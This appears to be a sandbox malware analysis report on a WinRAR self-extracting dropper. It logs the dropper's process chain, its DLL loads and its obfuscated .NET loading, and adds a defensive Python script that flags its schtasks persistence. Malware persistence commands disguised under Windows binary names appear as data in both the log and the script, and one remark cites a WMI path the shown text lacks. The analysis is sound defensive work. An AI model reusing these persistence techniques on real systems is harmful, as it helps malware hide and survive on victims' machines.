Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
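The process list above is the whole infection chain in one place: an SFX stub starts WScript.exe on a .vbe, the script host starts cmd.exe on a .bat, cmd.exe starts the .NET dropper, and the dropper registers dozens of scheduled tasks that re-launch copies named after Windows binaries (Idle.exe, dasHost.exe, upfc.exe, TextInputHost.exe) from Program Files and user directories, both at logon and every few minutes with `/rl HIGHEST`. The Python below is an added triage example written for this page, not Joe Sandbox code and not part of the sample; it rebuilds the parent/child tree from a constructed copy of a few of the rows above and pulls the persistence indicators out of each `schtasks /create` line. The `(parent, command line)` tuple layout, the `SYSTEM_NAMES` allowlist, the 15-minute watchdog threshold and every function name are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the "Process created" rows in the report above,
# reduced to (parent image as reported, child command line). The tuple layout is my own,
# not Joe Sandbox's export format.
SAMPLE_EVENTS = [
    ("unknown", r'"C:\Users\user\Desktop\rWjaZEKha8.exe"'),
    (r"C:\Users\user\Desktop\rWjaZEKha8.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe"'),
    (r"C:\Windows\SysWOW64\wscript.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "'),
    (r"C:\Windows\SysWOW64\cmd.exe", r'"C:\bridgehyperperfdhcp\intoDhcp.exe"'),
    (r"C:\bridgehyperperfdhcp\intoDhcp.exe",
     r'''schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f'''),
    (r"C:\bridgehyperperfdhcp\intoDhcp.exe",
     r'''schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /f'''),
    (r"C:\bridgehyperperfdhcp\intoDhcp.exe",
     r'''schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f'''),
]

SYSTEM_ROOT = "c:\\windows\\"
# Assumption (an analyst allowlist, not something the report states): binaries with these
# names are expected only under %SystemRoot%. "Idle" has no on-disk binary at all (it is
# the System Idle pseudo-process), so any Idle.exe is suspect wherever it lives.
SYSTEM_NAMES = {"dashost.exe", "upfc.exe", "textinputhost.exe", "idle.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WATCHDOG_MAX_MINUTES = 15  # assumed threshold: /mo at or below this looks like a watchdog

SCHTASKS_RE = re.compile(
    r'/tn\s+"(?P<name>[^"]+)".*?/sc\s+(?P<sched>\S+)(?:\s+/mo\s+(?P<mo>\d+))?'
    r'.*?/tr\s+"\'?(?P<target>[^"\']+)\'?"',
    re.IGNORECASE,
)


def image_of(cmdline):
    """First token of a command line: the quoted path if present, else the bare token."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return m.group(1) or m.group(2)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def audit_schtasks(cmdline):
    """Extract the persistence-relevant fields of a schtasks /create command line."""
    m = SCHTASKS_RE.search(cmdline)
    if not m:
        return None
    target, sched, reasons = m.group("target"), m.group("sched").upper(), []
    if sched == "ONLOGON":
        reasons.append("runs at every logon")
    if sched == "MINUTE" and m.group("mo") and int(m.group("mo")) <= WATCHDOG_MAX_MINUTES:
        reasons.append(f"re-launched every {m.group('mo')} min (watchdog)")
    if re.search(r"/rl\s+HIGHEST", cmdline, re.IGNORECASE):
        reasons.append("requests highest run level")
    if basename(target) in SYSTEM_NAMES and not target.lower().startswith(SYSTEM_ROOT):
        reasons.append("system binary name outside %SystemRoot%")
    return {"task": m.group("name"), "target": target, "reasons": reasons}


def analyze(events):
    """Build a parent->children map and collect findings from (parent, cmdline) pairs.

    Keyed by lowercased image basename because the sandbox spells one process two ways
    (wscript.exe under SysWOW64 in one column, WScript.exe under System32 in the other);
    a real pipeline would key by PID instead.
    """
    children, process_findings, tasks = defaultdict(list), [], []
    for parent, cmdline in events:
        child = image_of(cmdline)
        p, c = basename(parent), basename(child)
        children[p].append(child)
        if p in SCRIPT_HOSTS and c == "cmd.exe":
            process_findings.append(f"{p} spawned cmd.exe: {cmdline}")
        if p == "cmd.exe" and not child.lower().startswith(SYSTEM_ROOT):
            process_findings.append(f"cmd.exe launched a binary outside %SystemRoot%: {child}")
        if c == "schtasks.exe":
            audit = audit_schtasks(cmdline)
            if audit:
                tasks.append(dict(audit, created_by=parent))
    return {"tree": dict(children), "process_findings": process_findings, "tasks": tasks}


def render_tree(tree, root="unknown", depth=0, lines=None):
    """Indented text rendering of the process tree; depth-capped so cmd->cmd cannot loop."""
    lines = [] if lines is None else lines
    if depth > 16:
        return lines
    for child in tree.get(basename(root), []):
        lines.append("  " * depth + child)
        render_tree(tree, child, depth + 1, lines)
    return lines


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    print("\n".join(render_tree(result["tree"])))
    for finding in result["process_findings"]:
        print("PROCESS:", finding)
    for t in result["tasks"]:
        print(f"TASK {t['task']!r} -> {t['target']}: {'; '.join(t['reasons'])}")
```

Run against the constructed rows it reports the wscript.exe to cmd.exe hop, cmd.exe launching intoDhcp.exe from a directory outside %SystemRoot%, and three tasks: "Idle" (logon trigger, highest run level, system name outside %SystemRoot%), "dasHostd" (6-minute watchdog, system name outside %SystemRoot%) and "OjTEkrTlLyhdtO" (7-minute watchdog). On a live host the same logic applies to Sysmon event 1 or Security event 4688 command lines, with the caveat that processes created through the WMI Win32_Process::Create path seen above will show WmiPrvSE.exe, not intoDhcp.exe, as their parent.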
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Sections loaded (in order): api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Sections loaded (in order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, gpapi.dll, windows.storage.dll, propsys.dll, apphelp.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded (in order): cmdext.dll, apphelp.dll
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, amsi.dll, userenv.dll, ntmarta.dll, wbemcomn.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Sections loaded (in order): kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll (the same four DLLs in each of the seven schtasks.exe instances listed here)
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: mscoree.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: apphelp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: kernel.appcore.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: version.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: vcruntime140_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: uxtheme.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: windows.storage.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: wldp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: profapi.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: cryptsp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: rsaenh.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: cryptbase.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: mscoree.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: kernel.appcore.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: version.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: vcruntime140_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: uxtheme.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: windows.storage.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: wldp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: profapi.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: cryptsp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: rsaenh.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: cryptbase.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
            Source: C:\Users\user\Desktop\rWjaZEKha8.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Portable Devices\db8cdfc8abc352
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Portable Devices\Idle.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Portable Devices\6ccacd8608530f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Portable Devices\upfc.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Portable Devices\ea1d8f6d871115
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\Windows Mail\db8cdfc8abc352
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe  Directory created: C:\Program Files\MSBuild\db8cdfc8abc352
            Source: rWjaZEKha8.exe  Static file information: File size 1661068 > 1048576
            Source: rWjaZEKha8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rWjaZEKha8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rWjaZEKha8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rWjaZEKha8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rWjaZEKha8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rWjaZEKha8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rWjaZEKha8.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: rWjaZEKha8.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rWjaZEKha8.exe
            Source: rWjaZEKha8.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rWjaZEKha8.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rWjaZEKha8.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rWjaZEKha8.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rWjaZEKha8.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YLBOejLqkP7JJsWpVv2.cs  .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, YLBOejLqkP7JJsWpVv2.cs  .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs  .Net Code: LYpwiAcHeV System.AppDomain.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs  .Net Code: LYpwiAcHeV System.Reflection.Assembly.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs  .Net Code: LYpwiAcHeV
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs  .Net Code: LYpwiAcHeV System.AppDomain.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs  .Net Code: LYpwiAcHeV System.Reflection.Assembly.Load(byte[])
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, UJwjOa4G8SOXAiuCBUR.cs  .Net Code: LYpwiAcHeV
            Source: C:\Users\user\Desktop\rWjaZEKha8.exe  File created: C:\bridgehyperperfdhcp\__tmp_rar_sfx_access_check_4853375
            Source: rWjaZEKha8.exe  Static PE information: section name: .didat
            Source: C:\Users\user\Desktop\rWjaZEKha8.exe  Code function: 0_2_0018E28C push eax; ret 0_2_0018E2AA
            Source: C:\Users\user\Desktop\rWjaZEKha8.exe  Code function: 0_2_0018CAC9 push eax; retf 0018h 0_2_0018CACE
            Source: C:\Users\user\Desktop\rWjaZEKha8.exe  Code function: 0_2_0018ED46 push ecx; ret 0_2_0018ED59
            Source: C:\Program Files\Windows Portable Devices\Idle.exe  Code function: 21_2_00007FFD9BA100BD pushad ; iretd 21_2_00007FFD9BA100C1
